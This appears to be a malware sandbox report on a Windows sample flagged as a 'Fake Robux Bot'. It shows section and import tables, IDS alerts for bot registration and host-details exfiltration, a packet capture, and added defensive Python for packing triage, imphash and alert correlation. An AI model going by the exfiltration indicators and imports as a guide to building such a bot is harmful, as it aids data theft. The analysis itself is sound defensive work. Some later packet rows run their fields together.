IMAGE_DIRECTORY_ENTRY_IAT             0xa000           0x230         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
.text   0x1000           0x83cc        0x8400    3f035b9a475e7b0bee14924a2ad04868  False     0.5557824337121212  zlib compressed data  6.326232743020032   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0xa000           0x1c4a        0x1e00    c7352e598965211983a506bc2a8aa61b  False     0.42109375          data                  4.731554548739669   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xc000           0xaa8         0x200     85c2aebd011c5c1b37c1009def59c2b6  False     0.09375             data                  0.5324895658143383  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0xd000           0x588         0x600     a25f8001a8d46e8c51bd3ab1ecc507ae  False     0.4876302083333333  data                  4.11853894347752    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0xe000           0x1e0         0x200     ae95088ed848b39aad014fdd45607faf  False     0.529296875         data                  4.701503258251789   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xf000           0x30          0x200     37d1b57c226da12c9be78a5fe517e953  False     0.123046875         data                  0.7148111080262498  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
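The section table above is the first thing an analyst checks for signs of packing. The following is an added example (my code, not Joe Sandbox's) that recomputes the measure behind the Entropy column and applies the usual static heuristics to the rows as printed: a section that is both writable and executable, entropy at or above 7.0, a virtual size far beyond the raw size, and an executable section with a non-standard name. The section values are copied from the table; the thresholds are my assumptions, not values the report states. On this sample none of the heuristics fires, which agrees with the data: nothing in the section layout suggests a packer, so the reported behaviour has to come from what the code does (see the imports and the network activity), not from an unpacking stub.

```python
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Section:
    name: str
    virtual_size: int
    raw_size: int
    entropy: float
    characteristics: frozenset


# Values copied from the section table of OSLdZanXNc.exe above.
SECTIONS = [
    Section(".text", 0x83cc, 0x8400, 6.326232743020032,
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"})),
    Section(".rdata", 0x1c4a, 0x1e00, 4.731554548739669,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".data", 0xaa8, 0x200, 0.5324895658143383,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ", "IMAGE_SCN_MEM_WRITE"})),
    Section(".pdata", 0x588, 0x600, 4.11853894347752,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".rsrc", 0x1e0, 0x200, 4.701503258251789,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".reloc", 0x30, 0x200, 0.7148111080262498,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE", "IMAGE_SCN_MEM_READ"})),
]

# Analyst heuristics (assumptions, not values from the report).
HIGH_ENTROPY = 7.0          # bits per byte; compressed/encrypted data sits near 8.0
VSIZE_SLACK = 0x1000        # one page of uninitialised data is normal for .data/.bss


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the section's raw bytes: 0.0 for a constant run, 8.0 for uniform.
    This is the measure the report's Entropy column reports."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def triage_section(s: Section) -> list:
    """Return the heuristic findings for one section (empty list = nothing unusual)."""
    findings = []
    if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= s.characteristics:
        findings.append("writable and executable")
    if s.entropy >= HIGH_ENTROPY:
        findings.append(f"high entropy {s.entropy:.2f} (packed or encrypted content?)")
    if s.raw_size == 0 and s.virtual_size > 0:
        findings.append("no raw data on disk but non-zero virtual size (filled at runtime)")
    elif s.virtual_size > 2 * s.raw_size and s.virtual_size - s.raw_size > VSIZE_SLACK:
        findings.append("virtual size far exceeds raw size (unpacking area?)")
    if "IMAGE_SCN_MEM_EXECUTE" in s.characteristics and s.name != ".text":
        findings.append(f"executable section with non-standard name {s.name!r}")
    return findings


def triage(sections) -> dict:
    """Map section name -> findings, keeping only sections with at least one finding."""
    out = {}
    for s in sections:
        found = triage_section(s)
        if found:
            out[s.name] = found
    return out


if __name__ == "__main__":
    print(triage(SECTIONS) or "no packing indicators in the section table")
```

A UPX-style section (for example a writable, executable `UPX1` with entropy near 8) trips three of the four checks at once, which is the pattern that should redirect analysis towards unpacking before any further static work; this sample shows none of that.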
Name         RVA     Size   Type                                                       Language  Country        ZLIB Complexity
RT_MANIFEST  0xe060  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5931758530183727
Imports by DLL:
KERNEL32.dll: UnmapViewOfFile, CloseHandle, GetFileSize, CreateFileMappingW, MapViewOfFile, ReadFile, CopyFileA, GetLastError, CreateFileA, WinExec, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, GetModuleHandleW
VCRUNTIME140.dll: __current_exception, memmove, memcpy, memset, __current_exception_context, strrchr, __C_specific_handler
api-ms-win-crt-heap-l1-1-0.dll: malloc, free, realloc, _set_new_mode
api-ms-win-crt-stdio-l1-1-0.dll: _set_fmode, __stdio_common_vsprintf, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
api-ms-win-crt-runtime-l1-1-0.dll: _exit, _initialize_onexit_table, _register_onexit_function, _cexit, terminate, exit, _register_thread_local_exe_atexit_callback, _initterm_e, _initterm, __p___argv, _crt_atexit, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, __p___argc
api-ms-win-crt-math-l1-1-0.dll: __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll: _configthreadlocale
api-ms-win-crt-string-l1-1-0.dll: strncmp
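The Import Hash given in the static information is computed from exactly this table. Here is an added example (my code, not Joe Sandbox's and not pefile's) of the standard imphash normalisation: each library name lower-cased with a .dll/.ocx/.sys suffix removed, each function name lower-cased (ordinal imports become ordN), the entries joined with commas in import-directory order, and the MD5 of that string. The import list is copied from the report; it is an assumption that the report prints it in import-directory order, and since that is unverified the value this computes is not claimed to equal a43d15331c9ee28121574258bd659d78. The WATCHLIST at the end is my own selection of the imports that account for behaviours in this report, not something the report states.

```python
import hashlib

# Import table of OSLdZanXNc.exe as printed above. Assumption: the report lists
# the DLLs and functions in import-directory order, which is what imphash depends on.
IMPORTS = [
    ("KERNEL32.dll", [
        "UnmapViewOfFile", "CloseHandle", "GetFileSize", "CreateFileMappingW", "MapViewOfFile",
        "ReadFile", "CopyFileA", "GetLastError", "CreateFileA", "WinExec", "IsDebuggerPresent",
        "InitializeSListHead", "GetSystemTimeAsFileTime", "GetCurrentThreadId",
        "GetCurrentProcessId", "QueryPerformanceCounter", "IsProcessorFeaturePresent",
        "TerminateProcess", "GetCurrentProcess", "SetUnhandledExceptionFilter",
        "UnhandledExceptionFilter", "RtlVirtualUnwind", "RtlLookupFunctionEntry",
        "RtlCaptureContext", "GetModuleHandleW"]),
    ("VCRUNTIME140.dll", [
        "__current_exception", "memmove", "memcpy", "memset", "__current_exception_context",
        "strrchr", "__C_specific_handler"]),
    ("api-ms-win-crt-heap-l1-1-0.dll", ["malloc", "free", "realloc", "_set_new_mode"]),
    ("api-ms-win-crt-stdio-l1-1-0.dll", [
        "_set_fmode", "__stdio_common_vsprintf", "__stdio_common_vfprintf", "__acrt_iob_func",
        "__p__commode"]),
    ("api-ms-win-crt-runtime-l1-1-0.dll", [
        "_exit", "_initialize_onexit_table", "_register_onexit_function", "_cexit", "terminate",
        "exit", "_register_thread_local_exe_atexit_callback", "_initterm_e", "_initterm",
        "__p___argv", "_crt_atexit", "_get_initial_narrow_environment",
        "_initialize_narrow_environment", "_configure_narrow_argv", "_c_exit", "_set_app_type",
        "_seh_filter_exe", "__p___argc"]),
    ("api-ms-win-crt-math-l1-1-0.dll", ["__setusermatherr"]),
    ("api-ms-win-crt-locale-l1-1-0.dll", ["_configthreadlocale"]),
    ("api-ms-win-crt-string-l1-1-0.dll", ["strncmp"]),
]

STRIPPED_EXTENSIONS = ("dll", "ocx", "sys")


def normalize(imports) -> list:
    """Canonical 'library.function' strings in import-directory order.

    Library names are lower-cased with a .dll/.ocx/.sys suffix removed; function
    names are lower-cased; ordinal imports (given here as ints) become 'ordN'.
    (The real algorithm resolves ordinals of a few well-known DLLs to names first;
    that lookup table is omitted here.)"""
    out = []
    for dll, funcs in imports:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in STRIPPED_EXTENSIONS:
            lib = base
        for func in funcs:
            name = f"ord{func}" if isinstance(func, int) else func.lower()
            out.append(f"{lib}.{name}")
    return out


def imphash(imports) -> str:
    """MD5 over the comma-joined normalised import strings."""
    return hashlib.md5(",".join(normalize(imports)).encode()).hexdigest()


# Analyst watch-list (assumption): imports that account for behaviours in this report.
WATCHLIST = {
    "WinExec": "starts another program (the PowerShell command lines reported above)",
    "CopyFileA": "copies a file to a new location (staging/persistence)",
    "IsDebuggerPresent": "anti-debugging check",
    "CreateFileMappingW": "maps a file into memory",
    "MapViewOfFile": "maps a file into memory",
}


def watchlisted_imports(imports) -> list:
    """Sorted 'DLL!function' entries from the import table that are on the watch-list."""
    return sorted(f"{dll}!{func}" for dll, funcs in imports for func in funcs
                  if isinstance(func, str) and func in WATCHLIST)


if __name__ == "__main__":
    print("imphash:", imphash(IMPORTS))
    for entry in watchlisted_imports(IMPORTS):
        print(entry, "-", WATCHLIST[entry.split("!")[1]])
```

Because the hash depends on order as well as content, a rebuilt binary with the same functions in a different import order gets a different imphash; the value is useful for clustering builds from one toolchain and source tree, not for matching functionality.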
Language of compilation system  Country where language is spoken
English                         United States
Timestamp                         SID      Signature                                          Severity  Source IP     Source Port  Dest IP          Dest Port  Protocol
2024-10-15T15:54:30.522779+0200  2857658  ETPRO MALWARE Win32/Fake Robux Bot Registration    1         192.168.2.12  55611        162.159.138.232  443        TCP
2024-10-15T15:54:46.501030+0200  2857659  ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil  1     192.168.2.12  55624        162.159.138.232  443        TCP
2024-10-15T15:54:53.884821+0200  2857659  ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil  1     192.168.2.12  55625        162.159.138.232  443        TCP
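An IDS alert only names a 4-tuple and a timestamp; tying it to the packet capture is what tells you which connection it fired on and what else the host was talking to. The following is an added example (my code, not Joe Sandbox's or Suricata's) that parses an alert row and packet rows in the layout used on this page, groups packets into TCP flows keyed by the client's ephemeral port, finds the flow an alert belongs to together with the captured packet nearest its timestamp, and lists the servers contacted with their ports. The embedded rows are a constructed subset of the alert table above and the packet table that follows; CEST is assumed to mean UTC+2; the "higher port is the client" rule is a heuristic that holds for the ephemeral ports in this capture.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Time zones the report's packet timestamps may carry (assumption: CEST = UTC+2).
TZ = {"CEST": timezone(timedelta(hours=2)), "CET": timezone(timedelta(hours=1))}

# Constructed input: a subset of rows from the packet table, in the column order
# Timestamp, Source Port, Dest Port, Source IP, Dest IP.
PACKETS = """\
Oct 15, 2024 15:54:09.016926050 CEST  49711  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.021776915 CEST  80     49711  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:29.661647081 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:29.661688089 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.234739065 CEST  55613  80     192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:30.522788048 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.522911072 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:30.861242056 CEST  55614  443    192.168.2.12     104.20.4.235
"""

# Constructed input: the first Suricata alert row, columns separated by two or more
# spaces: Timestamp, SID, Signature, Severity, Source IP, Source Port, Dest IP, Dest Port, Protocol.
ALERT = ("2024-10-15T15:54:30.522779+0200  2857658  ETPRO MALWARE Win32/Fake Robux Bot Registration"
         "  1  192.168.2.12  55611  162.159.138.232  443  TCP")

PACKET_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) (?P<tz>\w+)\s+"
    r"(?P<sport>\d+)\s+(?P<dport>\d+)\s+(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)$")


def parse_packet(line):
    """One packet row -> (timestamp, src ip, src port, dst ip, dst port)."""
    m = PACKET_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised packet row: {line!r}")
    base = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
    # The report prints nanoseconds; datetime keeps microseconds.
    ts = base.replace(microsecond=int(m["frac"][:6].ljust(6, "0")), tzinfo=TZ[m["tz"]])
    return ts, m["src"], int(m["sport"]), m["dst"], int(m["dport"])


def parse_alert(line):
    """One alert row -> dict with a timezone-aware timestamp and the 4-tuple."""
    f = re.split(r"\s{2,}", line.strip())
    return {"ts": datetime.strptime(f[0], "%Y-%m-%dT%H:%M:%S.%f%z"), "sid": int(f[1]),
            "signature": f[2], "severity": int(f[3]), "src": f[4], "sport": int(f[5]),
            "dst": f[6], "dport": int(f[7]), "proto": f[8]}


def flow_key(src, sport, dst, dport):
    """Canonical (client ip, client port, server ip, server port).
    Heuristic: the endpoint on the higher (ephemeral) port is the client."""
    return (src, sport, dst, dport) if sport >= dport else (dst, dport, src, sport)


def build_flows(text):
    """Packet rows -> {flow key: [(timestamp, direction), ...]} in capture order."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = parse_packet(line)
        key = flow_key(src, sport, dst, dport)
        direction = "client->server" if (src, sport) == key[:2] else "server->client"
        flows[key].append((ts, direction))
    return dict(flows)


def match_alert(alert, flows):
    """Flow the alert's 4-tuple belongs to, plus the captured packet nearest its timestamp."""
    key = flow_key(alert["src"], alert["sport"], alert["dst"], alert["dport"])
    packets = flows.get(key)
    if not packets:
        return None
    nearest_ts, direction = min(packets, key=lambda p: abs(p[0] - alert["ts"]))
    return {"flow": key, "packets": len(packets),
            "nearest_packet_us": abs(nearest_ts - alert["ts"]) // timedelta(microseconds=1),
            "nearest_direction": direction}


def servers_contacted(flows):
    """Server IP -> sorted list of server ports the client opened flows to."""
    out = defaultdict(set)
    for (_, _, server, port) in flows:
        out[server].add(port)
    return {ip: sorted(ports) for ip, ports in out.items()}


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    print(match_alert(parse_alert(ALERT), flows))
    print(servers_contacted(flows))
```

On this capture the alert's 4-tuple resolves to the 55611 flow to 162.159.138.232:443 and the nearest packet lies within a few microseconds of the alert time, so the two clocks agree closely enough to use timestamp proximity for correlation; the server summary is the quick view of which hosts (here GitHub Pages, two Cloudflare-fronted addresses) the sample reached, to be compared against the report's DNS section.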
Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Oct 15, 2024 15:54:09.016926050 CEST  49711  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.021776915 CEST  80     49711  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:09.021857023 CEST  49711  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.024914026 CEST  49711  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.029725075 CEST  80     49711  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:09.616374969 CEST  80     49711  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:09.617268085 CEST  80     49711  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:09.618653059 CEST  49711  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.861903906 CEST  49711  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.866924047 CEST  80     49711  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:09.936141014 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.936187983 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:09.936359882 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.947333097 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:09.947349072 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.565216064 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.565315962 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:10.569961071 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:10.569968939 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.570239067 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.578193903 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:10.619401932 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.810374022 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.810419083 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.810440063 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.810463905 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.810494900 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:10.810511112 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.810523033 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:10.810699940 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.810736895 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:10.810751915 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.818442106 CEST  443    49712  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:10.818499088 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:10.912328005 CEST  49712  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:29.661647081 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:29.661688089 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:29.661990881 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:29.662384987 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:29.662401915 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.234739065 CEST  55613  80     192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:30.239660025 CEST  80     55613  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:30.239734888 CEST  55613  80     192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:30.242310047 CEST  55613  80     192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:30.247143030 CEST  80     55613  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:30.286418915 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.286501884 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:30.288907051 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:30.288913012 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.289164066 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.296406031 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:30.339406967 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.339469910 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:30.339482069 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.522788048 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.522859097 CEST  443    55611  162.159.138.232  192.168.2.12
Oct 15, 2024 15:54:30.522911072 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:30.531781912 CEST  55611  443    192.168.2.12     162.159.138.232
Oct 15, 2024 15:54:30.858222961 CEST  80     55613  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:30.861242056 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:30.861287117 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:30.861409903 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:30.864432096 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:30.864454985 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:30.907675028 CEST  55613  80     192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:31.468970060 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:31.469233990 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:31.471301079 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:31.471313000 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:31.471594095 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:31.481828928 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:31.527405024 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:31.623400927 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:31.623495102 CEST  443    55614  104.20.4.235     192.168.2.12
Oct 15, 2024 15:54:31.623667002 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:31.634654045 CEST  55614  443    192.168.2.12     104.20.4.235
Oct 15, 2024 15:54:31.678729057 CEST  55616  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:31.683907032 CEST  80     55616  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:31.684020042 CEST  55616  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:31.684456110 CEST  55616  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:31.689291000 CEST  80     55616  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.330882072 CEST  80     55616  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.330966949 CEST  80     55616  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.330976009 CEST  80     55616  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.331024885 CEST  55616  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.331104994 CEST  55616  80     192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.331944942 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.331984997 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.332045078 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.332544088 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.332560062 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.336019993 CEST  80     55616  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.946047068 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.946157932 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.948363066 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.948369980 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.948601961 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:32.949610949 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:32.995394945 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.083158016 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.083236933 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.083266020 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.083278894 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:33.083290100 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.083317995 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.083332062 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:33.083337069 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.083379030 CEST  55617  443    192.168.2.12     185.199.109.133
Oct 15, 2024 15:54:33.083394051 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.088042974 CEST  443    55617  185.199.109.133  192.168.2.12
Oct 15, 2024 15:54:33.088095903 CEST  55617  443    192.168.2.12     185.199.109.133
                                                                                        Oct 15, 2024 15:54:33.109529972 CEST55617443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:37.843954086 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:37.848958015 CEST8055619104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:37.849139929 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:37.850070000 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:37.854918957 CEST8055619104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.476238012 CEST8055619104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.478346109 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:38.478367090 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.478434086 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:38.481247902 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:38.481266975 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:38.517102957 CEST5561980192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.088493109 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.088567972 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.090259075 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.090267897 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.090500116 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.096527100 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.139403105 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.238169909 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.238245010 CEST44355620104.20.4.235192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.238404036 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.256236076 CEST55620443192.168.2.12104.20.4.235
                                                                                        Oct 15, 2024 15:54:39.268138885 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.273143053 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.273231983 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.273380995 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.278300047 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.866935015 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.867567062 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.867767096 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.867799044 CEST5562180192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.868761063 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.868814945 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.869081020 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.869508982 CEST55622443192.168.2.12185.199.109.133
                                                                                        Oct 15, 2024 15:54:39.869518995 CEST44355622185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:39.872801065 CEST8055621185.199.109.133192.168.2.12
                                                                                        Oct 15, 2024 15:54:40.488370895 CEST44355622185.199.109.133192.168.2.12
